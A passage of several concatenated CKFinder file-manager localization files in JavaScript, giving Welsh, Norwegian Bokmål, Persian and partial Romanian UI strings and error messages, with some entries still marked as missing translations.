BasketRemoveConfirm : 'Ydych chi wir am dynnu\'r ffeil "%1" o\'r fasged?', BasketRemoveConfirmMultiple : 'Do you really want to remove %1 files from the basket?', // MISSING BasketEmpty : 'Dim ffeiliau yn y fasged, llusgwch a\'m gollwng.', BasketCopyFilesHere : 'Copïo Ffeiliau o\'r Fasged', BasketMoveFilesHere : 'Symud Ffeiliau o\'r Fasged', // Global messages OperationCompletedSuccess : 'Operation completed successfully.', // MISSING OperationCompletedErrors : 'Operation completed with errors.', // MISSING FileError : '%s: %e', // MISSING // Move and Copy files MovedFilesNumber : 'Number of files moved: %s.', // MISSING CopiedFilesNumber : 'Number of files copied: %s.', // MISSING MoveFailedList : 'The following files could not be moved:<br />%s', // MISSING CopyFailedList : 'The following files could not be copied:<br />%s', // MISSING // Toolbar Buttons (some used elsewhere) Upload : 'Lanlwytho', UploadTip : 'Lanlwytho Ffeil Newydd', Refresh : 'Adfywio', Settings : 'Gosodiadau', Help : 'Cymorth', HelpTip : 'Cymorth', // Context Menus Select : 'Dewis', SelectThumbnail : 'Dewis Bawdlun', View : 'Dangos', Download : 'Lawrlwytho', NewSubFolder : 'Is-ffolder Newydd', Rename : 'Ailenwi', Delete : 'Dileu', DeleteFiles : 'Delete Files', // MISSING CopyDragDrop : 'Copïo Yma', MoveDragDrop : 'Symud Yma', // Dialogs RenameDlgTitle : 'Ailenwi', NewNameDlgTitle : 'Enw Newydd', FileExistsDlgTitle : 'Ffeil Eisoes yn Bodoli', SysErrorDlgTitle : 'Gwall System', FileOverwrite : 'Trosysgrifo', FileAutorename : 'Awto-ailenwi', ManuallyRename : 'Manually rename', // MISSING // Generic OkBtn : 'Iawn', CancelBtn : 'Diddymu', CloseBtn : 'Cau', // Upload Panel UploadTitle : 'Lanlwytho Ffeil Newydd', UploadSelectLbl : 'Dewis ffeil i lanlwytho', UploadProgressLbl : '(Lanlwythiad ar y gweill, arhoswch...)', UploadBtn : 'Lanlwytho\'r Ffeil a Ddewiswyd', UploadBtnCancel : 'Diddymu', UploadNoFileMsg : 'Dewiswch ffeil ar eich cyfrifiadur.', UploadNoFolder : 'Dewiswch ffolder cyn lanlwytho.', UploadNoPerms : 'Does dim hawl lanlwytho ffeiliau.', UploadUnknError : 'Gwall wrth anfon y ffeil.', UploadExtIncorrect : 'Does dim hawl cadw\'r ffeiliau â\'r estyniad hwn yn y ffolder hwn.', // Flash Uploads UploadLabel : 'Ffeiliau i\'w Lanlwytho', UploadTotalFiles : 'Nifer y Ffeiliau:', UploadTotalSize : 'Maint Cyfan:', UploadSend : 'Lanlwytho', UploadAddFiles : 'Ychwanegu Ffeiliau', UploadClearFiles : 'Clirio Ffeiliau', UploadCancel : 'Diddymu Lanlwythiad', UploadRemove : 'Tynnu', UploadRemoveTip : 'Tynnu !f', UploadUploaded : 'Wedi Lanlwytho !n%', UploadProcessing : 'Yn prosesu...', // Settings Panel SetTitle : 'Gosodiadau', SetView : 'Golwg:', SetViewThumb : 'Bawdluniau', SetViewList : 'Rhestr', SetDisplay : 'Arddangosiad:', SetDisplayName : 'Enw\'r Ffeil', SetDisplayDate : 'Dyddiad', SetDisplaySize : 'Maint y Ffeil', SetSort : 'Trefnu:', SetSortName : 'gan Enw\'r Ffeil', SetSortDate : 'gan y Dyddiad', SetSortSize : 'gan y Maint', SetSortExtension : 'gan Estyniad', // Status Bar FilesCountEmpty : '<Ffolder Gwag>', FilesCountOne : '1 ffeil', FilesCountMany : '%1 ffeil', // Size and Speed Kb : '%1 KB', Mb : '%1 MB', // MISSING Gb : '%1 GB', // MISSING SizePerSecond : '%1/s', // MISSING // Connector Error Messages. ErrorUnknown : 'Does dim modd cwblhau\'r cais. (Gwall %1)', Errors : { 10 : 'Gorchymyn annilys.', 11 : 'Doedd math yr adnodd heb ei benodi yn y cais.', 12 : 'Dyw math yr adnodd ddim yn ddilys.', 102 : 'Enw ffeil neu ffolder annilys.', 103 : 'Doedd dim modd cwblhau\'r cais oherwydd cyfyngiadau awdurdodi.', 104 : 'Doedd dim modd cwblhau\'r cais oherwydd cyfyngiadau i hawliau\'r system ffeilio.', 105 : 'Estyniad ffeil annilys.', 109 : 'Cais annilys.', 110 : 'Gwall anhysbys.', 111 : 'It was not possible to complete the request due to resulting file size.', // MISSING 115 : 'Mae ffeil neu ffolder gyda\'r un enw yn bodoli yn barod.', 116 : 'Methu â darganfod y ffolder. Adfywiwch a cheisio eto.', 117 : 'Methu â darganfod y ffeil. Adfywiwch y rhestr ffeiliau a cheisio eto.', 118 : 'Mae\'r llwybrau gwreiddiol a tharged yn unfath.', 201 : 'Mae ffeil â\'r enw hwnnw yn bodoli yn barod. Cafodd y ffeil a lanlwythwyd ei hailenwi i "%1".', 202 : 'Ffeil annilys.', 203 : 'Ffeil annilys. Mae maint y ffeil yn rhy fawr.', 204 : 'Mae\'r ffeil a lanwythwyd wedi chwalu.', 205 : 'Does dim ffolder dros dro ar gael er mwyn lanlwytho ffeiliau iddo ar y gweinydd hwn.', 206 : 'Cafodd y lanlwythiad ei ddiddymu oherwydd rhesymau diogelwch. Mae\'r ffeil yn cynnwys data yn debyg i HTML.', 207 : 'Cafodd y ffeil a lanlwythwyd ei hailenwi i "%1".', 300 : 'Methodd symud y ffeil(iau).', 301 : 'Methodd copïo\'r ffeil(iau).', 500 : 'Cafodd y porwr ffeiliau ei anallogi oherwydd rhesymau diogelwch. Cysylltwch â\'ch gweinyddwr system a gwirio\'ch ffeil ffurfwedd CKFinder.', 501 : 'Mae cynhaliaeth bawdluniau wedi\'i hanalluogi.' }, // Other Error Messages. ErrorMsg : { FileEmpty : 'Does dim modd i enw\'r ffeil fod yn wag.', FileExists : 'Mae\'r ffeil %s yn bodoli yn barod.', FolderEmpty : 'Does dim modd i\'r ffolder fod yn wag.', FolderExists : 'Folder %s already exists.', // MISSING FolderNameExists : 'Folder already exists.', // MISSING FileInvChar : 'Does dim hawl defnyddio\'r nodau canlynol i enwi ffeil: \n\\ / : * ? " < > |', FolderInvChar : 'Does dim hawl defnyddio\'r nodau canlynol i enwi ffolder: \n\\ / : * ? " < > |', PopupBlockView : 'Doedd dim modd agor y ffeil mewn ffenestr newydd. Bydd angen ffurfweddu\'r porwr i analluogi pob ataliwr \'popup\' ar gyfer y safle hwn.', XmlError : 'Doedd dim modd llwytho\'r ymateb XML yn gywir o\'r gweinydd.', XmlEmpty : 'Doedd dim modd llwytho\'r ymateb XML o\'r gweinydd gwe. Gwnaeth y gweinydd ddychwelyd ymateb gwag.', XmlRawResponse : 'Yr ymateb noeth o\'r gweinydd: %s' }, // Imageresize plugin Imageresize : { dialogTitle : 'Ailmeintio %s', sizeTooBig : 'Methu â gosod lled neu uchder y ddelwedd i werth yn uwch na\'r maint gwreiddiol (%size).', resizeSuccess : 'Delwedd wedi\'i hailmeintio.', thumbnailNew : 'Creu bawdlun newydd', thumbnailSmall : 'Bach (%s)', thumbnailMedium : 'Canolig (%s)', thumbnailLarge : 'Mawr (%s)', newSize : 'Gosod maint newydd', width : 'Lled', height : 'Uchder', invalidHeight : 'Uchder annilys.', invalidWidth : 'Lled annilys.', invalidName : 'Enw ffeil annilys.', newImage : 'Creu delwedd newydd', noExtensionChange : 'Methu â newid estyniad y ffeil.', imageSmall : 'Mae\'r ddelwedd wreiddiol yn rhy fach.', contextMenuName : 'Ailmeintio', lockRatio : 'Cloi\'r cymhareb', resetSize : 'Ailosod y maint' }, // Fileeditor plugin Fileeditor : { save : 'Cadw', fileOpenError : 'Methu ag agor y ffeil.', fileSaveSuccess : 'Ffeil wedi\'i chadw.', contextMenuName : 'Golygu', loadingFile : 'Llwytho ffeil, arhoswch...' }, Maximize : { maximize : 'Uchafu', minimize : 'Isafu' }, Gallery : { current : 'Image {current} of {total}' // MISSING }, Zip : { extractHereLabel : 'Extract here', // MISSING extractToLabel : 'Extract to...', // MISSING downloadZipLabel : 'Download as zip', // MISSING compressZipLabel : 'Compress to zip', // MISSING removeAndExtract : 'Remove existing and extract', // MISSING extractAndOverwrite : 'Extract overwriting existing files', // MISSING extractSuccess : 'File extracted successfully.' // MISSING } };
JavaScript
/* * CKFinder * ======== * http://cksource.com/ckfinder * Copyright (C) 2007-2013, CKSource - Frederico Knabben. All rights reserved. * * The software, this file, and its contents are subject to the CKFinder * License. Please read the license.txt file before using, installing, copying, * modifying, or distributing this file or part of its contents. The contents of * this file is part of the Source Code of CKFinder. * */ /** * @fileOverview Defines the {@link CKFinder.lang} object for the Norwegian * Bokmål language. */ /** * Contains the dictionary of language entries. * @namespace */ CKFinder.lang['no'] = { appTitle : 'CKFinder', // Common messages and labels. common : { // Put the voice-only part of the label in the span. unavailable : '%1<span class="cke_accessibility">, utilgjenglig</span>', confirmCancel : 'Noen av valgene har blitt endret. Er du sikker på at du vil lukke dialogen?', ok : 'OK', cancel : 'Avbryt', confirmationTitle : 'Bekreftelse', messageTitle : 'Informasjon', inputTitle : 'Spørsmål', undo : 'Angre', redo : 'Gjør om', skip : 'Hopp over', skipAll : 'Hopp over alle', makeDecision : 'Hvilken handling skal utføres?', rememberDecision: 'Husk mitt valg' }, // Language direction, 'ltr' or 'rtl'. dir : 'ltr', HelpLang : 'en', LangCode : 'no', // Date Format // d : Day // dd : Day (padding zero) // m : Month // mm : Month (padding zero) // yy : Year (two digits) // yyyy : Year (four digits) // h : Hour (12 hour clock) // hh : Hour (12 hour clock, padding zero) // H : Hour (24 hour clock) // HH : Hour (24 hour clock, padding zero) // M : Minute // MM : Minute (padding zero) // a : Firt char of AM/PM // aa : AM/PM DateTime : 'dd/mm/yyyy HH:MM', DateAmPm : ['AM', 'PM'], // Folders FoldersTitle : 'Mapper', FolderLoading : 'Laster...', FolderNew : 'Skriv inn det nye mappenavnet: ', FolderRename : 'Skriv inn det nye mappenavnet: ', FolderDelete : 'Er du sikker på at du vil slette mappen "%1"?', FolderRenaming : ' (Endrer mappenavn...)', FolderDeleting : ' (Sletter...)', DestinationFolder : 'Destination Folder', // MISSING // Files FileRename : 'Skriv inn det nye filnavnet: ', FileRenameExt : 'Er du sikker på at du vil endre filtypen? Filen kan bli ubrukelig.', FileRenaming : 'Endrer filnavn...', FileDelete : 'Er du sikker på at du vil slette denne filen "%1"?', FilesDelete : 'Are you sure you want to delete %1 files?', // MISSING FilesLoading : 'Laster...', FilesEmpty : 'Denne katalogen er tom.', DestinationFile : 'Destination File', // MISSING SkippedFiles : 'List of skipped files:', // MISSING // Basket BasketFolder : 'Kurv', BasketClear : 'Tøm kurv', BasketRemove : 'Fjern fra kurv', BasketOpenFolder : 'Åpne foreldremappen', BasketTruncateConfirm : 'Vil du virkelig fjerne alle filer fra kurven?', BasketRemoveConfirm : 'Vil du virkelig fjerne filen "%1" fra kurven?', BasketRemoveConfirmMultiple : 'Do you really want to remove %1 files from the basket?', // MISSING BasketEmpty : 'Ingen filer i kurven, dra og slipp noen.', BasketCopyFilesHere : 'Kopier filer fra kurven', BasketMoveFilesHere : 'Flytt filer fra kurven', // Global messages OperationCompletedSuccess : 'Operation completed successfully.', // MISSING OperationCompletedErrors : 'Operation completed with errors.', // MISSING FileError : '%s: %e', // MISSING // Move and Copy files MovedFilesNumber : 'Number of files moved: %s.', // MISSING CopiedFilesNumber : 'Number of files copied: %s.', // MISSING MoveFailedList : 'The following files could not be moved:<br />%s', // MISSING CopyFailedList : 'The following files could not be copied:<br />%s', // MISSING // Toolbar Buttons (some used elsewhere) Upload : 'Last opp', UploadTip : 'Last opp en ny fil', Refresh : 'Oppdater', Settings : 'Innstillinger', Help : 'Hjelp', HelpTip : 'Hjelp finnes kun på engelsk', // Context Menus Select : 'Velg', SelectThumbnail : 'Velg miniatyr', View : 'Vis fullversjon', Download : 'Last ned', NewSubFolder : 'Ny undermappe', Rename : 'Endre navn', Delete : 'Slett', DeleteFiles : 'Delete Files', // MISSING CopyDragDrop : 'Kopier hit', MoveDragDrop : 'Flytt hit', // Dialogs RenameDlgTitle : 'Gi nytt navn', NewNameDlgTitle : 'Nytt navn', FileExistsDlgTitle : 'Filen finnes allerede', SysErrorDlgTitle : 'Systemfeil', FileOverwrite : 'Overskriv', FileAutorename : 'Gi nytt navn automatisk', ManuallyRename : 'Manually rename', // MISSING // Generic OkBtn : 'OK', CancelBtn : 'Avbryt', CloseBtn : 'Lukk', // Upload Panel UploadTitle : 'Last opp ny fil', UploadSelectLbl : 'Velg filen du vil laste opp', UploadProgressLbl : '(Laster opp filen, vennligst vent...)', UploadBtn : 'Last opp valgt fil', UploadBtnCancel : 'Avbryt', UploadNoFileMsg : 'Du må velge en fil fra din datamaskin', UploadNoFolder : 'Vennligst velg en mappe før du laster opp.', UploadNoPerms : 'Filopplastning er ikke tillatt.', UploadUnknError : 'Feil ved sending av fil.', UploadExtIncorrect : 'Filtypen er ikke tillatt i denne mappen.', // Flash Uploads UploadLabel : 'Filer for opplastning', UploadTotalFiles : 'Totalt antall filer:', UploadTotalSize : 'Total størrelse:', UploadSend : 'Last opp', UploadAddFiles : 'Legg til filer', UploadClearFiles : 'Tøm filer', UploadCancel : 'Avbryt opplastning', UploadRemove : 'Fjern', UploadRemoveTip : 'Fjern !f', UploadUploaded : 'Lastet opp !n%', UploadProcessing : 'Behandler...', // Settings Panel SetTitle : 'Innstillinger', SetView : 'Filvisning:', SetViewThumb : 'Miniatyrbilder', SetViewList : 'Liste', SetDisplay : 'Vis:', SetDisplayName : 'Filnavn', SetDisplayDate : 'Dato', SetDisplaySize : 'Filstørrelse', SetSort : 'Sorter etter:', SetSortName : 'Filnavn', SetSortDate : 'Dato', SetSortSize : 'Størrelse', SetSortExtension : 'Filetternavn', // Status Bar FilesCountEmpty : '<Tom Mappe>', FilesCountOne : '1 fil', FilesCountMany : '%1 filer', // Size and Speed Kb : '%1 KB', Mb : '%1 MB', Gb : '%1 GB', SizePerSecond : '%1/s', // Connector Error Messages. ErrorUnknown : 'Det var ikke mulig å utføre forespørselen. (Feil %1)', Errors : { 10 : 'Ugyldig kommando.', 11 : 'Ressurstypen ble ikke spesifisert i forepørselen.', 12 : 'Ugyldig ressurstype.', 102 : 'Ugyldig fil- eller mappenavn.', 103 : 'Kunne ikke utføre forespørselen pga manglende autorisasjon.', 104 : 'Kunne ikke utføre forespørselen pga manglende tilgang til filsystemet.', 105 : 'Ugyldig filtype.', 109 : 'Ugyldig forespørsel.', 110 : 'Ukjent feil.', 111 : 'It was not possible to complete the request due to resulting file size.', // MISSING 115 : 'Det finnes allerede en fil eller mappe med dette navnet.', 116 : 'Kunne ikke finne mappen. Oppdater vinduet og prøv igjen.', 117 : 'Kunne ikke finne filen. Oppdater vinduet og prøv igjen.', 118 : 'Kilde- og mål-bane er like.', 201 : 'Det fantes allerede en fil med dette navnet. Den opplastede filens navn har blitt endret til "%1".', 202 : 'Ugyldig fil.', 203 : 'Ugyldig fil. Filen er for stor.', 204 : 'Den opplastede filen er korrupt.', 205 : 'Det finnes ingen midlertidig mappe for filopplastinger.', 206 : 'Opplastingen ble avbrutt av sikkerhetshensyn. Filen inneholder HTML-aktig data.', 207 : 'Den opplastede filens navn har blitt endret til "%1".', 300 : 'Klarte ikke å flytte fil(er).', 301 : 'Klarte ikke å kopiere fil(er).', 500 : 'Filvelgeren ikke tilgjengelig av sikkerhetshensyn. Kontakt systemansvarlig og be han sjekke CKFinder\'s konfigurasjonsfil.', 501 : 'Funksjon for minityrbilder er skrudd av.' }, // Other Error Messages. ErrorMsg : { FileEmpty : 'Filnavnet kan ikke være tomt.', FileExists : 'Filen %s finnes alt.', FolderEmpty : 'Mappenavnet kan ikke være tomt.', FolderExists : 'Folder %s already exists.', // MISSING FolderNameExists : 'Folder already exists.', // MISSING FileInvChar : 'Filnavnet kan ikke inneholde følgende tegn: \n\\ / : * ? " < > |', FolderInvChar : 'Mappenavnet kan ikke inneholde følgende tegn: \n\\ / : * ? " < > |', PopupBlockView : 'Du må skru av popup-blockeren for å se bildet i nytt vindu.', XmlError : 'Det var ikke mulig å laste XML-dataene i svaret fra serveren.', XmlEmpty : 'Det var ikke mulig å laste XML-dataene fra serverne, svaret var tomt.', XmlRawResponse : 'Rått datasvar fra serveren: %s' }, // Imageresize plugin Imageresize : { dialogTitle : 'Endre størrelse %s', sizeTooBig : 'Kan ikke sette høyde og bredde til større enn orginalstørrelse (%size).', resizeSuccess : 'Endring av bildestørrelse var vellykket.', thumbnailNew : 'Lag ett nytt miniatyrbilde', thumbnailSmall : 'Liten (%s)', thumbnailMedium : 'Medium (%s)', thumbnailLarge : 'Stor (%s)', newSize : 'Sett en ny størrelse', width : 'Bredde', height : 'Høyde', invalidHeight : 'Ugyldig høyde.', invalidWidth : 'Ugyldig bredde.', invalidName : 'Ugyldig filnavn.', newImage : 'Lag ett nytt bilde', noExtensionChange : 'Filendelsen kan ikke endres.', imageSmall : 'Kildebildet er for lite.', contextMenuName : 'Endre størrelse', lockRatio : 'Lås forhold', resetSize : 'Tilbakestill størrelse' }, // Fileeditor plugin Fileeditor : { save : 'Lagre', fileOpenError : 'Klarte ikke å åpne filen.', fileSaveSuccess : 'Fillagring var vellykket.', contextMenuName : 'Rediger', loadingFile : 'Laster fil, vennligst vent...' }, Maximize : { maximize : 'Maksimer', minimize : 'Minimer' }, Gallery : { current : 'Bilde {current} av {total}' }, Zip : { extractHereLabel : 'Extract here', // MISSING extractToLabel : 'Extract to...', // MISSING downloadZipLabel : 'Download as zip', // MISSING compressZipLabel : 'Compress to zip', // MISSING removeAndExtract : 'Remove existing and extract', // MISSING extractAndOverwrite : 'Extract overwriting existing files', // MISSING extractSuccess : 'File extracted successfully.' // MISSING } };
JavaScript
/* * CKFinder * ======== * http://cksource.com/ckfinder * Copyright (C) 2007-2013, CKSource - Frederico Knabben. All rights reserved. * * The software, this file, and its contents are subject to the CKFinder * License. Please read the license.txt file before using, installing, copying, * modifying, or distributing this file or part of its contents. The contents of * this file is part of the Source Code of CKFinder. * */ /** * @fileOverview Defines the {@link CKFinder.lang} object for the Persian * language. */ /** * Contains the dictionary of language entries. * @namespace */ CKFinder.lang['fa'] = { appTitle : 'CKFinder', // Common messages and labels. common : { // Put the voice-only part of the label in the span. unavailable : '%1<span class="cke_accessibility">, عدم دسترسی</span>', confirmCancel : 'برخی از گزینه ها تغییر کرده است، آیا مایل به بستن این پنجره هستید؟', ok : 'تائید', cancel : 'لغو', confirmationTitle : 'تاییدیه', messageTitle : 'اطلاعات', inputTitle : 'سوال', undo : 'حالت قبلی', redo : 'حالت بعدی', skip : 'نادیده گرفتن', skipAll : 'نادیده گرفتن همه', makeDecision : 'چه عملی انجام شود؟', rememberDecision: 'انتخاب من را بیاد داشته باش' }, // Language direction, 'ltr' or 'rtl'. dir : 'rtl', HelpLang : 'en', LangCode : 'fa', // Date Format // d : Day // dd : Day (padding zero) // m : Month // mm : Month (padding zero) // yy : Year (two digits) // yyyy : Year (four digits) // h : Hour (12 hour clock) // hh : Hour (12 hour clock, padding zero) // H : Hour (24 hour clock) // HH : Hour (24 hour clock, padding zero) // M : Minute // MM : Minute (padding zero) // a : Firt char of AM/PM // aa : AM/PM DateTime : 'yyyy/mm/dd h:MM aa', DateAmPm : ['ق.ظ', 'ب.ظ'], // Folders FoldersTitle : 'پوشه ها', FolderLoading : 'بارگذاری...', FolderNew : 'لطفا نام پوشه جدید را وارد کنید: ', FolderRename : 'لطفا نام پوشه جدید را وارد کنید: ', FolderDelete : 'آیا اطمینان دارید که قصد حذف کردن پوشه "%1" را دارید؟', FolderRenaming : ' (در حال تغییر نام...)', FolderDeleting : ' (در حال حذف...)', DestinationFolder : 'Destination Folder', // MISSING // Files FileRename : 'لطفا نام جدید فایل را درج کنید: ', FileRenameExt : 'آیا اطمینان دارید که قصد تغییر نام پسوند این فایل را دارید؟ ممکن است فایل غیر قابل استفاده شود', FileRenaming : 'در حال تغییر نام...', FileDelete : 'آیا اطمینان دارید که قصد حذف نمودن فایل "%1" را دارید؟', FilesDelete : 'Are you sure you want to delete %1 files?', // MISSING FilesLoading : 'بارگذاری...', FilesEmpty : 'این پوشه خالی است', DestinationFile : 'Destination File', // MISSING SkippedFiles : 'List of skipped files:', // MISSING // Basket BasketFolder : 'سبد', BasketClear : 'پاک کردن سبد', BasketRemove : 'حذف از سبد', BasketOpenFolder : 'باز نمودن پوشه والد', BasketTruncateConfirm : 'تمام فایل های موجود در سبد حذف شود؟', BasketRemoveConfirm : 'فایل "%1" از سبد حذف شود؟', BasketRemoveConfirmMultiple : 'Do you really want to remove %1 files from the basket?', // MISSING BasketEmpty : 'هیچ فایلی در سبد نیست, برای افزودن فایل را به اینجا بکشید و رها کنید', BasketCopyFilesHere : 'کپی فایلها از سبد', BasketMoveFilesHere : 'انتقال فایلها از سبد', // Global messages OperationCompletedSuccess : 'Operation completed successfully.', // MISSING OperationCompletedErrors : 'Operation completed with errors.', // MISSING FileError : '%s: %e', // MISSING // Move and Copy files MovedFilesNumber : 'Number of files moved: %s.', // MISSING CopiedFilesNumber : 'Number of files copied: %s.', // MISSING MoveFailedList : 'The following files could not be moved:<br />%s', // MISSING CopyFailedList : 'The following files could not be copied:<br />%s', // MISSING // Toolbar Buttons (some used elsewhere) Upload : 'آپلود', UploadTip : 'آپلود فایل جدید', Refresh : 'بروزرسانی', Settings : 'تنظیمات', Help : 'راهنما', HelpTip : 'راهنما', // Context Menus Select : 'انتخاب', SelectThumbnail : 'انتخاب تصویر کوچک', View : 'نمایش', Download : 'دانلود', NewSubFolder : 'زیرپوشه جدید', Rename : 'تغییر نام', Delete : 'حذف', DeleteFiles : 'Delete Files', // MISSING CopyDragDrop : 'کپی فایل به اینجا', MoveDragDrop : 'انتقال فایل به اینجا', // Dialogs RenameDlgTitle : 'تغییر نام', NewNameDlgTitle : 'نام جدید', FileExistsDlgTitle : 'فایلی با این نام وجود دارد', SysErrorDlgTitle : 'خطای سیستم', FileOverwrite : 'رونویسی', FileAutorename : 'تغییر نام خودکار', ManuallyRename : 'Manually rename', // MISSING // Generic OkBtn : 'تایید', CancelBtn : 'لغو', CloseBtn : 'بستن', // Upload Panel UploadTitle : 'آپلود فایل جدید', UploadSelectLbl : 'انتخاب فابل برای آپلود', UploadProgressLbl : '(درحال ارسال، لطفا صبر کنید...)', UploadBtn : 'آپلود فایل', UploadBtnCancel : 'لغو', UploadNoFileMsg : 'لطفا یک فایل جهت ارسال انتخاب کنید', UploadNoFolder : 'لطفا پیش از آپلود، یک پوشه انتخاب کنید.', UploadNoPerms : 'اجازه ارسال فایل نداده شنده است', UploadUnknError : 'خطا در ارسال', UploadExtIncorrect : 'پسوند فایل برای این پوشه مجاز نیست.', // Flash Uploads UploadLabel : 'آپلود فایل', UploadTotalFiles : 'مجموع فایلها:', UploadTotalSize : 'مجموع حجم:', UploadSend : 'آپلود فایل', UploadAddFiles : 'افزودن فایلها', UploadClearFiles : 'پاک کردن فایلها', UploadCancel : 'لغو آپلود', UploadRemove : 'حذف', UploadRemoveTip : '!f حذف فایل', UploadUploaded : '!n% آپلود شد', UploadProcessing : 'در حال پردازش...', // Settings Panel SetTitle : 'تنظیمات', SetView : 'نمایش:', SetViewThumb : 'تصویر کوچک', SetViewList : 'فهرست', SetDisplay : 'نمایش:', SetDisplayName : 'نام فایل', SetDisplayDate : 'تاریخ', SetDisplaySize : 'اندازه فایل', SetSort : 'مرتبسازی:', SetSortName : 'با نام فایل', SetSortDate : 'با تاریخ', SetSortSize : 'با اندازه', SetSortExtension : 'با پسوند', // Status Bar FilesCountEmpty : '<پوشه خالی>', FilesCountOne : 'یک فایل', FilesCountMany : '%1 فایل', // Size and Speed Kb : '%1KB', Mb : '%1MB', Gb : '%1GB', SizePerSecond : '%1/s', // Connector Error Messages. ErrorUnknown : 'امکان تکمیل درخواست فوق وجود ندارد (خطا: %1)', Errors : { 10 : 'دستور نامعتبر.', 11 : 'نوع منبع در درخواست تعریف نشده است.', 12 : 'نوع منبع درخواست شده معتبر نیست.', 102 : 'نام فایل یا پوشه نامعتبر است.', 103 : 'امکان کامل کردن این درخواست بخاطر محدودیت اختیارات وجود ندارد.', 104 : 'امکان کامل کردن این درخواست بخاطر محدودیت دسترسی وجود ندارد.', 105 : 'پسوند فایل نامعتبر است.', 109 : 'درخواست نامعتبر است.', 110 : 'خطای ناشناخته.', 111 : 'It was not possible to complete the request due to resulting file size.', // MISSING 115 : 'فایل یا پوشه ای با این نام وجود دارد', 116 : 'پوشه یافت نشد. لطفا بروزرسانی کرده و مجددا تلاش کنید.', 117 : 'فایل یافت نشد. لطفا فهرست فایلها را بروزرسانی کرده و مجددا تلاش کنید.', 118 : 'منبع و مقصد مسیر یکی است.', 201 : 'یک فایل با همان نام از قبل موجود است. فایل آپلود شده به "%1" تغییر نام یافت.', 202 : 'فایل نامعتبر', 203 : 'فایل نامعتبر. اندازه فایل بیش از حد بزرگ است.', 204 : 'فایل آپلود شده خراب است.', 205 : 'هیچ پوشه موقتی برای آپلود فایل در سرور موجود نیست.', 206 : 'آپلود به دلایل امنیتی متوقف شد. فایل محتوی اطلاعات HTML است.', 207 : 'فایل آپلود شده به "%1" تغییر نام یافت.', 300 : 'انتقال فایل (ها) شکست خورد.', 301 : 'کپی فایل (ها) شکست خورد.', 500 : 'مرورگر فایل به دلایل امنیتی غیر فعال است. لطفا با مدیر سامانه تماس بگیرید تا تنظیمات این بخش را بررسی نماید.', 501 : 'پشتیبانی از تصاویر کوچک غیرفعال شده است' }, // Other Error Messages. ErrorMsg : { FileEmpty : 'نام فایل نمیتواند خالی باشد', FileExists : 'فایل %s از قبل وجود دارد', FolderEmpty : 'نام پوشه نمیتواند خالی باشد', FolderExists : 'Folder %s already exists.', // MISSING FolderNameExists : 'Folder already exists.', // MISSING FileInvChar : 'نام فایل نباید شامل این کاراکترها باشد: \n\\ / : * ? " < > |', FolderInvChar : 'نام پوشه نباید شامل این کاراکترها باشد: \n\\ / : * ? " < > |', PopupBlockView : 'امکان بازگشایی فایل در پنجره جدید نیست. لطفا به بخش تنظیمات مرورگر خود مراجعه کنید و امکان بازگشایی پنجرههای بازشور را برای این سایت فعال کنید.', XmlError : 'امکان بارگیری صحیح پاسخ XML از سرور مقدور نیست.', XmlEmpty : 'امکان بارگیری صحیح پاسخ XML از سرور مقدور نیست. سرور پاسخ خالی بر میگرداند.', XmlRawResponse : 'پاسخ اولیه از سرور: %s' }, // Imageresize plugin Imageresize : { dialogTitle : 'تغییر اندازه %s', sizeTooBig : 'امکان تغییر مقادیر ابعاد طول و عرض تصویر به مقداری بیش از ابعاد اصلی ممکن نیست (%size).', resizeSuccess : 'تصویر با موفقیت تغییر اندازه یافت.', thumbnailNew : 'ایجاد انگشتی جدید', thumbnailSmall : 'کوچک (%s)', thumbnailMedium : 'متوسط (%s)', thumbnailLarge : 'بزرگ (%s)', newSize : 'اندازه جدید', width : 'پهنا', height : 'ارتفاع', invalidHeight : 'ارتفاع نامعتبر.', invalidWidth : 'پهنا نامعتبر.', invalidName : 'نام فایل نامعتبر.', newImage : 'ایجاد تصویر جدید', noExtensionChange : 'تغییر پسوند فایل امکان پذیر نیست.', imageSmall : 'تصویر اصلی خیلی کوچک است', contextMenuName : 'تغییر اندازه', lockRatio : 'قفل کردن تناسب.', resetSize : 'بازنشانی اندازه.' }, // Fileeditor plugin Fileeditor : { save : 'ذخیره', fileOpenError : 'امکان باز کردن فایل نیست', fileSaveSuccess : 'فایل با موفقیت ذخیره شد.', contextMenuName : 'ویرایش', loadingFile : 'بارگذاری فایل، منتظر باشید...' }, Maximize : { maximize : 'بیشینه', minimize : 'کمینه' }, Gallery : { current : 'Image {current} of {total}' // MISSING }, Zip : { extractHereLabel : 'Extract here', // MISSING extractToLabel : 'Extract to...', // MISSING downloadZipLabel : 'Download as zip', // MISSING compressZipLabel : 'Compress to zip', // MISSING removeAndExtract : 'Remove existing and extract', // MISSING extractAndOverwrite : 'Extract overwriting existing files', // MISSING extractSuccess : 'File extracted successfully.' // MISSING } };
JavaScript
/* * CKFinder * ======== * http://cksource.com/ckfinder * Copyright (C) 2007-2013, CKSource - Frederico Knabben. All rights reserved. * * The software, this file, and its contents are subject to the CKFinder * License. Please read the license.txt file before using, installing, copying, * modifying, or distributing this file or part of its contents. The contents of * this file is part of the Source Code of CKFinder. * */ /** * @fileOverview Defines the {@link CKFinder.lang} object for the Romanian * language. */ /** * Contains the dictionary of language entries. * @namespace */ CKFinder.lang['ro'] = { appTitle : 'CKFinder', // Common messages and labels. common : { // Put the voice-only part of the label in the span. unavailable : '%1<span class="cke_accessibility">, indisponibil</span>', confirmCancel : 'Unele opțiuni au fost schimbate. Ești sigur că vrei să închizi fereastra de dialog?', ok : 'OK', cancel : 'Anulează', confirmationTitle : 'Confirmă', messageTitle : 'Informații', inputTitle : 'Întreabă', undo : 'Starea anterioară', redo : 'Starea ulterioară(redo)', skip : 'Sări', skipAll : 'Sări peste toate', makeDecision : 'Ce acțiune trebuie luată?', rememberDecision: 'Reține acțiunea pe viitor' }, // Language direction, 'ltr' or 'rtl'. dir : 'ltr', HelpLang : 'en', LangCode : 'ro', // Date Format // d : Day // dd : Day (padding zero) // m : Month // mm : Month (padding zero) // yy : Year (two digits) // yyyy : Year (four digits) // h : Hour (12 hour clock) // hh : Hour (12 hour clock, padding zero) // H : Hour (24 hour clock) // HH : Hour (24 hour clock, padding zero) // M : Minute // MM : Minute (padding zero) // a : Firt char of AM/PM // aa : AM/PM DateTime : 'dd/mm/yyyy HH:MM', DateAmPm : ['AM', 'PM'], // Folders FoldersTitle : 'Dosare', FolderLoading : 'Încărcare...', FolderNew : 'Te rugăm să introduci numele dosarului nou: ', FolderRename : 'Te rugăm să introduci numele nou al dosarului: ', FolderDelete : 'Ești sigur că vrei să ștergi dosarul "%1"?', FolderRenaming : ' (Redenumire...)', 